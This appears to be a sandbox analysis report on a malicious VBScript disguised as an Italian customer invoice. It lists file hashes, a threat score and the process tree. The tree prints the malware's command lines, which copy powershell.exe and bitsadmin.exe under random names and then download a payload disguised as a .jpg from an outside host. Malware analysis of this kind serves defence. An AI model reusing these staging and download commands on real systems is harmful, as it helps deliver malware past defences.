e9d30232236a8c05a58a9cc13ef79a0d360213ef096f69a3b9f7199e4b458df3 | Triage

Analysis

max time kernel
137s
max time network
52s
platform
windows10_x64
resource
win10v200430
submitted
13-07-2020 07:45

Sharing

Report Analysis Logs

General

Target

Fatt_cliente_STRPRI81C06H264H.vbs
Size

3KB
MD5

f8f845a5680b862bb8cbc3f0963e8a24
SHA1

132a39312e13dafab31cca938c64745fd7a82b29
SHA256

e9d30232236a8c05a58a9cc13ef79a0d360213ef096f69a3b9f7199e4b458df3
SHA512

e5772c837fae26bb4cf2cd8b4c0adae3f652faf74afed8fe7894fffea2eedce0296c147bef58e1a24c3239bf9ed076c4747c1263d4b472172a1469d2c6afe430

Score

8^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 992 wrote to memory of 3828	992	WScript.exe	cmd.exe
PID 992 wrote to memory of 3828	992	WScript.exe	cmd.exe
PID 992 wrote to memory of 1148	992	WScript.exe	cmd.exe
PID 992 wrote to memory of 1148	992	WScript.exe	cmd.exe
PID 992 wrote to memory of 1340	992	WScript.exe	iXRgjlH.exe
PID 992 wrote to memory of 1340	992	WScript.exe	iXRgjlH.exe
PID 992 wrote to memory of 1340	992	WScript.exe	iXRgjlH.exe

Executes dropped EXE 1 IoCs

Processes:

iXRgjlH.exe

pid process

1340 iXRgjlH.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_STRPRI81C06H264H.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ziXRgjlH.exe
2⤵
PID:3828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\iXRgjlH.exe
2⤵
PID:1148

C:\Users\Admin\AppData\Roaming\iXRgjlH.exe
"C:\Users\Admin\AppData\Roaming\iXRgjlH.exe" /transfer pJVFLY /download https://peliculadeestreno.com/libuna/STRPRI81C06H264H/en.jpg C:\Users\Admin\AppData\Roaming\en.jpg
2⤵
- Executes dropped EXE
PID:1340

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\iXRgjlH.exe

Download Submit
C:\Users\Admin\AppData\Roaming\iXRgjlH.exe

Download Submit
memory/1148-1-0x0000000000000000-mapping.dmp

Download
memory/1340-3-0x0000000000000000-mapping.dmp

Download
memory/3828-0-0x0000000000000000-mapping.dmp

Download